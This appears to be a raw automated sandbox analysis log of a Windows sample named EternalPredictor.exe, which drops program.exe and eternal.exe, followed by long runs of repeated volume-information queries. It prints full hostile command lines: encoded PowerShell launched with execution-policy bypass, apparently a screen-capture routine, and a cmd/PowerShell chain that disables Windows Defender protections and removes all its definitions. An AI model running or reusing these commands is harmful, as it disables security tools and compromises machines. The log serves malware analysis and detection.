aauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C679570 cpuid 5_2_00007FF72C679570
                        Source: C:\Users\user\Desktop\EternalPredictor.exeQueries volume information: C:\Users\user\Desktop\EternalPredictor.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeQueries volume information: C:\Users\user\AppData\Roaming\eternal.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_lzma.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_sqlite3.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformationJump to behavior
